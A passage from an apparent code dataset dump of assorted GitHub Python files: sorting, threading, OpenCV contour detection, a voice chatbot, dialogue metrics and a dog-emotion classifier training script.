import dt\n\n\ndef get_label(old_label, region_ids):\n if len(region_ids) > 5:\n return old_label\n\n # plural = ''\n # if len(region_ids) == 2:\n # plural = 's'\n\n region_ents = list(\n map(\n lambda region_id: ents.get_entity(region_id),\n region_ids,\n )\n )\n # label_entity_type = 
ent_types.get_entity_type(region_ents[0]['id'])\n return dt.to_kebab(\n # label_entity_type\n # + plural\n # + ' - '\n ' '.join(\n list(\n map(\n lambda ent: ent['name'],\n region_ents,\n )\n )\n )\n )\n","repo_name":"nuuuwan/sl_new_pds","sub_path":"src/sl_new_pds/region_utils.py","file_name":"region_utils.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32246370192","text":"\nfrom typing import List, Any\n\n\ndef selection_sort(nos: List[Any], N: int):\n \"\"\"\n This function takes a list and sorts them in ascending order\n\n The selection sort algorithm sorts an array by repeatedly finding \n the minimum element (considering ascending order) from unsorted part \n and putting it at the beginning.\n\n Selection sort is better than bubble sort as it requires less \n no of swappings and spends time in finding minimum element\n\n https://www.personal.kent.edu/~rmuhamma/Algorithms/MyAlgorithms/Sorting/selectionSort.htm\n\n param:\n nos: array of chars or ints or floats\n\n return: None\n\n complexity:\n worst: o(n*n)\n avg: o(n*n)\n best: o(n)\n \"\"\"\n for i in range(N):\n min_idx = i\n\n for j in range(i+1, N):\n if nos[j] < nos[min_idx]:\n min_idx = j\n\n nos[i], nos[min_idx] = nos[min_idx], nos[i]\n\n\nif __name__ == \"__main__\":\n arr = list('premkumar')\n selection_sort(arr, len(arr))\n print(arr)\n","repo_name":"premchalmeti/DSA_101","sub_path":"algo/sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34339728189","text":"from threading import Thread\nimport time\n\n\ndef carro(velocidade, piloto):\n trajeto = 0\n while trajeto <= 100:\n trajeto+=velocidade\n time.sleep(0.5)\n print('Piloto: {} KM: {} \\n'.format(piloto, trajeto))\n\n\n# def carro2(velocidade):\n# trajeto = 0\n# while trajeto <= 100:\n# print('carro2: ', trajeto)\n# trajeto+=velocidade\n\n# carro1(10)\n# carro2(20)\n\nt_carro1 = Thread(target=carro, args=[1, 'Rodrigo'])\nt_carro2 = Thread(target=carro, args=[1.5, 'Rodriguinho'])\nt_carro1.start()\nt_carro2.start()\n\n\n","repo_name":"jrrodrigo421/scriptsSegurancaDaInformacao","sub_path":"ferramentas_Python/threads_E_ip/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29235622663","text":"import time\nimport statistics\nimport matplotlib.pyplot as plt\n\narchivo = \"data_encoders.txt\"\n\nif __name__==\"__main__\":\n\n a = 0 #Variable para detectar la cantidad de reinicios\n\n #Contadores para hallar cuántos reinicios se registran en cada rueda\n contador1 = 0\n contador2 = 0\n contador3 = 0\n contador4 = 0\n contador5 = 0\n contador6 = 0\n\n t1 = time.perf_counter() \n f = open(archivo,'r')\n contenido = f.read()\n f.close()\n t2 = time.perf_counter() \n \n tiempo_lectura = t2 - t1\n\n print(f\"El tiempo para leer el archivo fue de: {tiempo_lectura} msec\")\n print(\"-----------------------------------------------------------------\")\n\n datos = contenido.split(\"\\n\")\n \n #Rueda 1:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[0]) - int(valor_1[0]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador1 = contador1 + 1\n a = a + 
1\n \n #Rueda 2:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[1]) - int(valor_1[1]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador2 = contador2 + 1\n a = a + 1 \n \n #Rueda 3:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[2]) - int(valor_1[2]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador3 = contador3 + 1\n a = a + 1 \n\n #Rueda 4:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[3]) - int(valor_1[3]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador4 = contador4 + 1\n a = a + 1 \n\n #Rueda 5:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[4]) - int(valor_1[4]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador5 = contador5 + 1\n a = a + 1 \n\n #Rueda 6:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[5]) - int(valor_1[5]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador6 = contador6 + 1\n a = a + 1 \n\n print(f\"El encoder de la rueda 1 ha presentado: {contador1} reinicios\") \n print(f\"El encoder de la rueda 2 ha presentado: {contador2} reinicios\") \n print(f\"El encoder de la rueda 3 ha presentado: {contador3} reinicios\") \n print(f\"El encoder de la rueda 4 ha presentado: {contador4} reinicios\")\n print(f\"El encoder de la rueda 5 ha presentado: {contador5} reinicios\")\n print(f\"El encoder de la rueda 6 ha presentado: {contador6} reinicios\")\n print(\"-----------------------------------------------------------------\")\n \n t3 = time.perf_counter() \n b = open(\"data_encoders.csv\",'w')\n lineas = b.write(contenido)\n f.close()\n t4 = time.perf_counter() \n \n tiempo_escritura = t4 - t3\n\n print(f\"El tiempo para escribir el archivo fue de: {tiempo_escritura} msec\")\n\n ","repo_name":"leleletus/arquitectura_x86_64","sub_path":"extras/modelosla/Lab7/Pregunta2.py","file_name":"Pregunta2.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32795447607","text":"from sklearn.preprocessing import LabelEncoder\nimport bisect\nimport logging\nimport numpy as np\n\n\nclass LabelEncoderRobust(LabelEncoder):\n def __init__(self):\n self.class_type = None\n\n def fit(self, y):\n super().fit(y)\n le_classes = self.classes_.tolist()\n logging.debug(\"LER classes: {}\".format(le_classes))\n if len(le_classes) > 0:\n self.class_type = type(le_classes[0])\n logging.debug(\"LER classes type: {}\".format(self.class_type))\n if self.class_type == str:\n bisect.insort_left(le_classes, 'UNKNOWN_LBL')\n if self.class_type == int:\n bisect.insort_left(le_classes, -999)\n self.classes_ = np.array(le_classes)\n\n def transform(self, y):\n for i in range(len(y)):\n item = y[i]\n if item not in self.classes_:\n logging.debug(\"transform LER classes type: {}\".format(self.class_type))\n if self.class_type == str:\n y[i] = 'UNKNOWN_LBL'\n elif self.class_type == int:\n y[i] 
= -999\n else:\n print(self.class_type)\n print(item)\n raise ValueError(\"list_type in None, cannot transform\")\n return super().transform(y)","repo_name":"abmohajeri/holodetect","sub_path":"utils/robust_label_encoder.py","file_name":"robust_label_encoder.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19766682852","text":"\r\n# Exercise 05: Preparing Image for edge detection\r\n\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\ndef nothing(x):\r\n pass\r\n\r\npath =\"C:\\\\Users\\\\hp\\\\Google Drive\\\\Fiverr Work\\\\2022\\\\15. Teaching OpenCV to Client\\\\Pics+scripts\\\\Pictures\"\r\n\r\ncv.namedWindow(\"image\")\r\n\r\ncv.createTrackbar(\"lower\", \"image\", 0, 255, nothing)\r\ncv.createTrackbar(\"upper\", \"image\", 0, 255, nothing)\r\n\r\n# img = cv.imread(path + \"\\\\piece05.png\")\r\n# imgResized = cv.resize(img, (200, 300))\r\nimg = cv.VideoCapture(0)\r\n\r\nkernel = np.ones((5,5), \"uint8\")\r\nwhile True:\r\n\r\n lo = cv.getTrackbarPos(\"lower\", \"image\")\r\n upper = cv.getTrackbarPos(\"upper\", \"image\")\r\n\r\n success, frame = img.read()\r\n\r\n imgGray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n blurImg = cv.GaussianBlur(imgGray, (5,5), 0)\r\n cannyImge = cv.Canny(blurImg, lo, upper)\r\n imgDilation = cv.dilate(cannyImge, kernel, iterations=1)\r\n contours, hierarchy = cv.findContours(imgDilation, \r\n cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\r\n\r\n print(len(contours))\r\n\r\n cv.drawContours(frame, contours, -1, (0, 255, 0), 3)\r\n\r\n # result = np.hstack((imgGray, blurImg, cannyImge, imgDilation))\r\n\r\n # cv.imshow(\"image\", imgResized)\r\n cv.imshow(\"image\", frame)\r\n\r\n k = cv.waitKey(1)\r\n\r\n if k == ord(\"q\"):\r\n break\r\n\r\ncv.destroyAllWindows()","repo_name":"ZiaUrRehman-bit/Object-Detection-from-Webcam-Using-OpenCV","sub_path":"CustomObectDetectionWEBCAM.py","file_name":"CustomObectDetectionWEBCAM.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30680260420","text":"import time\r\n\r\nprint (\"Would you like a timer, or a countdown?\")\r\n\r\ntimerOrCountdown = input()\r\nTORC = timerOrCountdown.lower()\r\n\r\n\r\ndef countdown(t):\r\n\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:02d}:{:02d}'.format(mins, secs)\r\n print(t)\r\n time.sleep(1)\r\n t -= 1\r\n\r\n\r\nif TORC == \"countdown\":\r\n\r\n print(\"Please enter the length in seconds of the desired countdown:\")\r\n countdownLength = input()\r\n countdown(int(countdownLength))\r\n\r\nelse:\r\n\r\n print(\"Welcome to the timer function.\")\r\n input(\"Press enter to start: \")\r\n start_time = time.time()\r\n\r\n input(\"Press enter to stop: \")\r\n end_time = time.time()\r\n\r\n time_lapsed = end_time - start_time\r\n print(str(time_lapsed) + \" seconds\")\r\n\r\n\r\n\r\n\r\n","repo_name":"GithubNathan/TimerAndStopwatch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40224789139","text":"import speech_recognition as sr\r\nimport pyttsx3\r\nimport openai\r\n\r\nopenai.api_key = \"Your API Key\"\r\n\r\nengine = pyttsx3.init()\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice', voices[1].id)\r\n\r\nr = sr.Recognizer()\r\nmic = sr.Microphone(device_index=1)\r\n\r\nconversation = []\r\nuser_name = 
\"Sam\"\r\nbot_name = \"Siri\"\r\n\r\ndef listen_for_audio():\r\n with mic as source:\r\n print(\"\\nListening...\")\r\n r.adjust_for_ambient_noise(source, duration=0.2)\r\n audio = r.listen(source)\r\n print(\"No longer listening\")\r\n\r\n try:\r\n user_input = r.recognize_google(audio)\r\n return user_input\r\n except sr.UnknownValueError:\r\n return \"\"\r\n\r\ndef generate_response(prompt):\r\n response = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=prompt,\r\n temperature=0.7,\r\n max_tokens=256,\r\n top_p=1,\r\n frequency_penalty=0,\r\n presence_penalty=0\r\n )\r\n\r\n response_str = response.choices[0].text.strip().replace(\"\\n\", \"\")\r\n return response_str\r\n\r\nwhile True:\r\n user_input = listen_for_audio()\r\n if user_input:\r\n prompt = user_name + \": \" + user_input + \"\\n\" + bot_name + \":\"\r\n conversation.append(prompt)\r\n\r\n response_str = generate_response(\"\\n\".join(conversation))\r\n conversation.append(response_str + \"\\n\")\r\n print(response_str)\r\n\r\n engine.say(response_str)\r\n engine.runAndWait()\r\n","repo_name":"Nihalrt/Chat-assistant","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38026236072","text":"import abc\nfrom typing import Optional, Union\n\nimport numpy as np\n\nfrom my_enums import ZsTodConstants\nfrom torchmetrics import Metric\nimport utils\n\n\nclass TodMetricsBase(Metric):\n \"\"\"Base class for all TOD metrics.\"\"\"\n\n full_state_update = False\n\n def __init__(\n self,\n score: bool = 0.0,\n is_cached=False,\n ):\n super().__init__()\n self.score = score\n self.is_cached = is_cached\n self.wrong_preds = {}\n\n def _add_wrong_pred(self, key: any):\n if type(key) not in [int, str]:\n key = str(key)\n self.wrong_preds[key] = self.wrong_preds.get(key, 0) + 1\n\n def _extract_section_from_text(\n self,\n text: Union[str, list[str]],\n start_token: str,\n end_token: str,\n default_value: any = None,\n multiple_values: bool = False,\n trim_spaces: bool = False,\n ):\n text = utils.get_text_in_between(\n text, start_token, end_token, default_value, multiple_values=multiple_values\n )\n if not trim_spaces:\n return text\n if isinstance(text, list):\n return [t.strip() for t in text]\n return text.strip()\n\n def _extract_section_and_split_items_from_text(\n self,\n text: str,\n start_token: str,\n end_token: str,\n separator: str = ZsTodConstants.ITEM_SEPARATOR,\n default_value: any = [],\n multiple_values: bool = False,\n trim_spaces: bool = False,\n ) -> np.ndarray:\n section_txts = self._extract_section_from_text(\n text,\n start_token,\n end_token,\n default_value,\n multiple_values=multiple_values,\n trim_spaces=trim_spaces,\n )\n if not section_txts:\n return default_value\n if type(section_txts) == list:\n out = [st.split(separator) for st in section_txts]\n return np.concatenate(out, axis=0, dtype=str)\n return np.array(section_txts.split(separator), dtype=str)\n\n def update(self, predictions: list[str], references: list[str]) -> None:\n if not len(predictions):\n raise ValueError(\"You must provide at least one prediction.\")\n if not len(references):\n raise ValueError(\"You must provide at least one reference.\")\n if not len(predictions) == len(references):\n raise ValueError(\n f\"Predictions {len(predictions)} and references {len(references)} must have the same length\"\n )\n self.is_cached = False\n return self._update(predictions, references)\n\n 
@abc.abstractmethod\n def _update(self, predictions: list[str], references: list[str]) -> None:\n pass\n\n def compute(self) -> float:\n if self.is_cached:\n return self.score\n self.score = self._compute()\n self.is_cached = True\n return self.score\n\n @abc.abstractmethod\n def _compute(self) -> float:\n pass\n\n\nclass MetricCollection:\n \"\"\"Collects multiple metrics.\n Args:\n metrics: A dictionary of metrics.\n Example Usage:\n metrics = MetricCollection(\n {\n \"goal_accuracy\": GoalAccuracyMetric(),\n \"intent_accuracy\": IntentAccuracyMetric(),\n \"requested_slots\": RequestedSlotsMetric(),\n }\n )\n references = # list of whole target str\n predictions = # list of whole prediction str\n metrics.add_batch(predictions, references)\n \"\"\"\n\n def __init__(self, metrics: dict[str, TodMetricsBase] = None):\n if metrics is None:\n raise ValueError(\"No metrics provided to MetricCollection\")\n self.metrics = metrics\n\n def add_batch(self, predictions: list[str], references: list[str]) -> None:\n for m in self.metrics.values():\n m.update(predictions, references)\n\n def compute(self) -> float:\n return [m.compute() for m in self.metrics.values()]\n\n def __str__(self):\n return \"\\n\".join([str(m) for m in self.metrics.values()])\n","repo_name":"MultifacetedNLP/ZS-ToD","sub_path":"zs_tod/src/metrics/tod_metrics_base.py","file_name":"tod_metrics_base.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17871932858","text":"import gym\n\nenv = gym.make(\"FrozenLake-v0\", is_slippery=True)\nenv.reset()\nenv.render()\n\nprint(\"Action space: \", env.action_space)\nprint(\"Observation space: \", env.observation_space)\n\nMAX_ITERATIONS = 10\nfor i in range(MAX_ITERATIONS):\n random_action = env.action_space.sample()\n new_state, reward, done, info = env.step(random_action)\n env.render()\n if done:\n break","repo_name":"shazi129/py_workspace","sub_path":"gym/test_env.py","file_name":"test_env.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28837188094","text":"import math\nimport os\nimport numpy as np\nimport torch\nimport logging\nimport pandas as pd\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom torch.utils.data import DataLoader, random_split\nfrom torchvision import transforms\nfrom tqdm import tqdm\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import f1_score, roc_auc_score, accuracy_score\nfrom sklearn.preprocessing import label_binarize\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport util\nfrom model.VitPatch16 import VIT_patch16\nfrom model.VitPatch32 import VIT_patch32\nfrom model.ResNet34 import ResNet_34\nfrom model.ResNet50 import ResNet_50\nfrom model.ResVit import ResVit\nfrom augmentation import augment\nfrom args import get_train_args\nfrom util import str2bool\n\n\ndef get_logger(logger_name, log_file, level=logging.INFO):\n logger = logging.getLogger(logger_name)\n fileHandler = logging.FileHandler(log_file, mode='a')\n\n logger.setLevel(level)\n logger.addHandler(fileHandler)\n\n return logger\n\n\ndef split_dataset(root_dir, csv_file='labels.csv', train_size=0.8, valid_size=0.1):\n train_dir = \"/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/train_df.csv\"\n valid_dir = 
\"/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/valid_df.csv\"\n test_dir = \"/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/test_df.csv\"\n if not os.path.exists(train_dir) and \\\n not os.path.exists(valid_dir) and \\\n not os.path.exists(test_dir):\n # Load labels from CSV\n df = pd.read_csv(os.path.join(root_dir, csv_file))\n\n # Encode labels to numerical data,\n # 0 for \"happy\", 1 for \"sad\", 2 for \"angry\", 3 for \"relaxed\"\n label_encoder = LabelEncoder()\n df['label'] = label_encoder.fit_transform(df['label'])\n\n # Split into train and temp (test + validation)\n train_data, temp_data = train_test_split(df, train_size=train_size, random_state=100, shuffle=True,\n stratify=df['label'])\n\n # Determine the test size such that the remaining data will be used for validation\n test_size = 1.0 - (valid_size / (1.0 - train_size))\n\n # Split temp_data into validation and test\n valid_data, test_data = train_test_split(temp_data, test_size=test_size, random_state=100, shuffle=True,\n stratify=temp_data['label'])\n print(\"Data set is split into: \\n Training: \", train_data.shape[0],\n \"\\n Validation: \", valid_data.shape[0],\n \"\\n Test: \", test_data.shape[0])\n train_data.to_csv(train_dir, index=False)\n valid_data.to_csv(valid_dir, index=False)\n test_data.to_csv(test_dir, index=False)\n else:\n train_data = pd.read_csv(train_dir)\n valid_data = pd.read_csv(valid_dir)\n test_data = pd.read_csv(test_dir)\n\n return train_data, valid_data, test_data\n\n\nclass SupervisedContrastiveLoss(nn.Module):\n def __init__(self, device, temperature=0.1, scale_by_temperature=True):\n super(SupervisedContrastiveLoss, self).__init__()\n self.device = device\n self.temperature = temperature\n self.scale_by_temperature = scale_by_temperature\n\n def forward(self, features, labels=None):\n \"\"\"\n input:\n features: input embeddings [batch_size, hidden_dim]\n labels: label of all samples [batch_size].\n mask: mask for learning [batch_size, batch_size], if sample i and j have the same label,then mask_{i,j}=1,\n 0 otherwise\n output:\n loss value\n \"\"\"\n features = F.normalize(features, p=2, dim=1)\n batch_size = features.shape[0]\n\n if labels is not None:\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(self.device)\n else:\n raise ValueError('Label is required to compute contrastive loss')\n\n # compute logits\n # similarity of samples i j\n anchor_dot_contrast = torch.div(torch.matmul(features, features.T), self.temperature)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n exp_logits = torch.exp(logits)\n\n # mask\n logits_mask = torch.ones_like(mask) - torch.eye(batch_size, device=mask.device)\n positives_mask = mask * logits_mask\n negatives_mask = 1. 
- mask\n\n num_positives_per_row = torch.sum(positives_mask, axis=1) # beside itself, num of positives [2 0 2 2]\n denominator = torch.sum(\n exp_logits * negatives_mask, axis=1, keepdims=True) + torch.sum(\n exp_logits * positives_mask, axis=1, keepdims=True)\n\n log_probs = logits - torch.log(denominator)\n if torch.any(torch.isnan(log_probs)):\n raise ValueError(\"Log_prob has nan!\")\n\n log_probs = torch.sum(\n log_probs * positives_mask, axis=1)[num_positives_per_row > 0] / num_positives_per_row[\n num_positives_per_row > 0]\n\n # loss\n loss = -log_probs\n if self.scale_by_temperature:\n loss *= self.temperature\n loss = loss.mean()\n return loss\n\n\nclass HybridLoss(nn.Module):\n def __init__(self, device, args, temperature=0.1, alpha=0.5):\n super(HybridLoss, self).__init__()\n self.cross_entropy_loss = nn.CrossEntropyLoss()\n self.contrastive_loss = SupervisedContrastiveLoss(device, temperature)\n self.alpha = alpha\n self.args = args\n\n def forward(self, output, embeddings, labels):\n if self.args.loss_name == \"Hybrid_loss\":\n cross_entropy_loss = self.cross_entropy_loss(output, labels)\n contrastive_loss = self.contrastive_loss(embeddings, labels)\n return self.alpha * cross_entropy_loss + (1 - self.alpha) * contrastive_loss\n else:\n cross_entropy_loss = self.cross_entropy_loss(output, labels)\n return cross_entropy_loss\n\n\nclass DogExpressionDataset(torch.utils.data.Dataset):\n def __init__(self, args, root_dir, df, dataset, transform=None):\n if not str2bool(args.augment):\n self.root_dir = root_dir\n self.transform = transform\n self.image_files = [os.path.join(self.root_dir, x) for x in df['filename']]\n self.image_labels = [x for x in df['label']]\n else:\n if dataset == \"Train\" or dataset == \"Validate\":\n self.root_dir = '/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/images_augment'\n self.transform = transform\n self.image_files = [os.path.join(self.root_dir, x) for x in df['filename']]\n self.image_labels = [x for x in df['label']]\n else:\n self.root_dir = root_dir\n self.transform = transform\n self.image_files = [os.path.join(self.root_dir, x) for x in df['filename']]\n self.image_labels = [x for x in df['label']]\n\n def __len__(self):\n return len(self.image_files)\n\n def __getitem__(self, idx):\n image = Image.open(self.image_files[idx])\n label = self.image_labels[idx]\n if self.transform:\n image = self.transform(image)\n return image, torch.tensor(label, dtype=torch.long)\n\n\ndef train(device, epoch_num, logger, writer, dataloader, model, loss_fn, optimizer):\n model.train()\n batch = 0\n avgloss = 0\n with tqdm(dataloader, unit=\"batch\") as tqdm_epoch:\n for X, y in tqdm_epoch:\n\n tqdm_epoch.set_description(f\"Epoch:\")\n # print(X)\n X, y = X.to(device), y.to(device)\n embeddings, logits = model(device, X)\n loss = loss_fn(output=logits, embeddings=embeddings, labels=y.long().squeeze())\n avgloss += loss\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n batch += 1\n tqdm_epoch.set_postfix(loss=(avgloss / batch).item(), lr=optimizer.param_groups[0]['lr'])\n\n # Calculate metrics\n pred_argmax = logits.argmax(1).detach().cpu().numpy()\n y_true = y.long().squeeze().cpu().numpy()\n acc = accuracy_score(y_true, pred_argmax)\n f1 = f1_score(y_true, pred_argmax, average='weighted')\n\n # Log metrics to TensorBoard\n writer.add_scalar('Train/Loss', loss.item(), epoch_num)\n writer.add_scalar('Train/Accuracy', acc, epoch_num)\n writer.add_scalar('Train/F1-score', f1, epoch_num)\n\n print(f\"Training Error: 
\\n Accuracy: {(100 * acc):>0.1f}%, Avg loss: {(avgloss / batch).item():>7f} \\n\")\n\n\ndef test(device, epoch_num, logger, writer, dataloader, model, loss_fn, scheduler):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss, correct = 0, 0\n confusion_pred, confusion_label =[], []\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n embeddings, logits = model(device, X)\n # sum up the test loss per batch\n test_loss += loss_fn(output=logits, embeddings=embeddings, labels=y.long().squeeze()).item()\n # sum up the number of correct predictions per batch\n correct += (logits.argmax(1) == y).type(torch.float).sum().item()\n # predicted labels [Type: A list of lists, list of batches of predictions]\n confusion_pred.append(list(logits.argmax(1).cpu().numpy()))\n # print(\"shape of logits: \", logits.shape)\n\n # actual labels [Type: A list of lists, list of batches of labels]\n confusion_label.append(list(y.cpu().numpy()))\n scheduler.step()\n # loss of each batch\n test_loss /= num_batches\n # accuracy rate\n correct /= size\n # flatten the list of lists into an array\n confusion_pred = np.array(sum(confusion_pred, []))\n # print(\"predictions: \",confusion_pred)\n # flatten the list of lists into an array\n confusion_label = np.array(sum(confusion_label, []))\n\n # Calculate metrics\n acc = accuracy_score(confusion_label, confusion_pred)\n f1 = f1_score(confusion_label, confusion_pred, average='weighted')\n\n # Log metrics to TensorBoard\n writer.add_scalar('Test/Loss', test_loss, epoch_num)\n writer.add_scalar('Test/Accuracy', acc, epoch_num)\n writer.add_scalar('Test/F1-score', f1, epoch_num)\n\n logger.debug(f\"Test Error: \\n Accuracy: {(100*acc):>0.1f}%, Test Avg loss: {test_loss:>8f} \\n\")\n print(f\"Test Error: \\n Accuracy: {(100*acc):>0.1f}%, Test Avg loss: {test_loss:>8f} \\n\")\n logger.debug(confusion_matrix(confusion_label, confusion_pred))\n print(confusion_matrix(confusion_label, confusion_pred))\n\n return 100 * correct, test_loss\n\ndef evaluate(device, epoch_num, logger, writer, dataloader, model, loss_fn, scheduler):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n valid_loss, correct = 0, 0\n confusion_pred, confusion_label =[], []\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n embeddings, logits = model(device, X)\n # sum up the test loss per batch\n valid_loss += loss_fn(output=logits, embeddings=embeddings, labels=y.long().squeeze()).item()\n # sum up the number of correct predictions per batch\n correct += (logits.argmax(1) == y).type(torch.float).sum().item()\n # predicted labels [Type: A list of lists, list of batches of predictions]\n confusion_pred.append(list(logits.argmax(1).cpu().numpy()))\n # print(\"shape of logits: \", logits.shape)\n\n # actual labels [Type: A list of lists, list of batches of labels]\n confusion_label.append(list(y.cpu().numpy()))\n scheduler.step()\n # loss of each batch\n valid_loss /= num_batches\n # accuracy rate\n correct /= size\n # flatten the list of lists into an array\n confusion_pred = np.array(sum(confusion_pred, []))\n # print(\"predictions: \",confusion_pred)\n # flatten the list of lists into an array\n confusion_label = np.array(sum(confusion_label, []))\n\n # Calculate metrics\n acc = accuracy_score(confusion_label, confusion_pred)\n f1 = f1_score(confusion_label, confusion_pred, average='weighted')\n\n # Log metrics to TensorBoard\n writer.add_scalar('Validate/Loss', 
valid_loss, epoch_num)\n writer.add_scalar('Validate/Accuracy', acc, epoch_num)\n writer.add_scalar('Validate/F1-score', f1, epoch_num)\n\n logger.debug(f\"Valid Error: \\n Accuracy: {(100*acc):>0.1f}%, Valid Avg loss: {valid_loss:>8f} \\n\")\n print(f\"Valid Error: \\n Accuracy: {(100*acc):>0.1f}%, Valid Avg loss: {valid_loss:>8f} \\n\")\n logger.debug(confusion_matrix(confusion_label, confusion_pred))\n print(confusion_matrix(confusion_label, confusion_pred))\n\n return 100 * correct, valid_loss\n\n\ndef main():\n # Set up logging and devices\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n log1 = get_logger('log1', './model/weight/log.txt', logging.DEBUG)\n log2 = get_logger('log2', './model/weight/pltdata.txt', logging.DEBUG)\n\n # Set up arguments\n args = get_train_args()\n args.save_dir = util.get_save_dir(args.save_dir, args.name)\n # TensorBoard writer\n writer = SummaryWriter(args.save_dir)\n\n # Check the current arguments to choose model\n print(\"The training weights of this model is saved at \", args.save_dir, '/train/', args.name,\n \"\\n The current `load path` is: \", args.load_path,\n \"\\n The current boolean `freeze` is: \", args.freeze,\n \"\\n The current boolean `training` is: \", args.training,\n \"\\n The current boolean `attention` is: \", args.attention,\n \"\\n The current int `epochs` is: \", args.epochs,\n \"\\n The current str `model_name` is: \", args.model_name,\n \"\\n The current str `loss_name` is: \", args.loss_name, \n \"\\n The current str `augment` is: \", args.augment,\"\\n\")\n\n # Data pre-processor\n test_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n # Data pre-processor\n train_transform = transforms.Compose([\n transforms.RandomRotation(30), # Randomly rotate the image within a range of -30 to 30 degrees\n transforms.RandomHorizontalFlip(), # Randomly flip the image horizontally\n transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n ])\n\n # Dataset loader\n root_dir = '/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/images'\n train_df, valid_df, test_df = split_dataset(root_dir=root_dir)\n # Augment train and validate dataset if needed\n if str2bool(args.augment) == True:\n train_df = augment(df=train_df,transform=train_transform, dataset=\"train\")\n valid_df = augment(df=valid_df,transform=train_transform, dataset=\"validate\")\n \n training_data = DogExpressionDataset(args=args, root_dir=root_dir, df=train_df, transform=test_transform, dataset=\"Train\")\n valid_data = DogExpressionDataset(args=args, root_dir=root_dir, df=valid_df, transform=test_transform, dataset=\"Validate\")\n test_data = DogExpressionDataset(args=args, root_dir=root_dir, df=test_df, transform=test_transform, dataset=\"Test\")\n\n train_loader = DataLoader(training_data, batch_size=32, shuffle=True, num_workers=2)\n valid_loader = DataLoader(valid_data, batch_size=32, shuffle=False, num_workers=2)\n test_loader = DataLoader(test_data, batch_size=32, shuffle=False, num_workers=2)\n\n print(args.model_name)\n\n if args.model_name == \"VIT_patch16\":\n 